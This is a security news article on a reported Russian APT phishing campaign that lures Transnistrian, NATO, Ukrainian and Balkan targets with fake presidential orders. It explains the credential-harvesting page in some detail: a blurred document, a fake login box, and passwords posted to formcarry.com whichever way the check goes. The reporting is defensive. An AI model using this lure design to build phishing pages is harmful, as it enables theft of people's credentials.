Blurred Deception: Russian APT Targets Transnistria and NATO with High-Pressure Phishing Lures

A sophisticated Russian Advanced Persistent Threat (APT) group has launched a targeted credential harvesting campaign against the governing body of Transnistria (the Pridnestrovian Moldavian Republic), utilizing high-pressure lures disguised as official presidential orders.

A new analysis by StrikeReady Labs details the attack, which began on December 5, 2025. The threat actors spoofed the Presidential Administration, sending emails with the subject line “Order of the President of the PMR… No. 441rp,” demanding that employees review a new mandatory decree immediately.

The attack vector relies on a malicious HTML attachment named Распоряжение № 441рп.pdf.html. Once opened, the file displays a convincing document from the “Pridnestrovian Moldavian Republic,” but with a frustrating twist: the content is intentionally obscured.

“The html loads the image in a DIV named bluer… The CSS applies a blur filter,” the report explains . By utilizing a CSS instruction (filter: blur(5.5px);), the attackers render the background document unreadable.

To see the “protected” file, the victim is presented with a login modal demanding their email and password. This visual social engineering tactic leverages curiosity and urgency, forcing the user to interact with the malicious login box to resolve the blurred image.

Under the hood, the phishing page employs unusual JavaScript logic to validate the victim’s input. The malware includes a specific function, checkP(str), which tests the entered password against a complex regular expression .

StrikeReady researchers noted a devious fail-safe in the code. While the script checks if the password meets complexity requirements, it doesn’t actually care if the validation passes or fails.

“If the password matches the regex, it is POSTed to formcarry.com. However, if the password does not match, it still steals the data,” the report states . This suggests the attackers are casting a wide net, potentially gathering secondary passwords that might be valid for other services even if they don’t match the specific criteria of the primary target.

While this specific incident targeted Transnistria, evidence suggests it is part of a much wider, long-running intelligence operation active since at least 2023.

StrikeReady Labs identified numerous other lures linked to this campaign, revealing a heavy focus on European and NATO-aligned entities. The target list includes:

• Ukraine: Specifically the Defense Industrial Base (DIB) and government sectors.
• The Balkans: Governments of Bosnia and Herzegovina, Macedonia, Montenegro, and Bulgaria.
• NATO: Lures referencing “Cyber Threats and NATO Horizon Scanning” and “NATO SCHOOL Course Catalogue”.
• Diplomatic Missions: Targeted via “Diplomatic List” lures accredited to the European Union.

In some variations of the campaign, the attackers utilized external infrastructure, such as the domain timesyncwindows[.]com, to load malicious scripts dynamically.

This campaign illustrates the persistent threat Russian APTs pose to regional stability, leveraging standard web technologies to compromise high-value targets across Eastern Europe.

Related Posts:

• Chinese APT Launches Spearphishing Campaign, Using Fake Cloudflare Lure to Deliver PlugX Malware
• Israel announces to investigate Facebook over Cambridge Analytica data breach
• Zimbra XSS Zero-Day (CVE-2025-27915) Actively Exploited; CISA Adds to KEV Catalog
• NATO member diplomatic office in Kiev has been attacked by hackers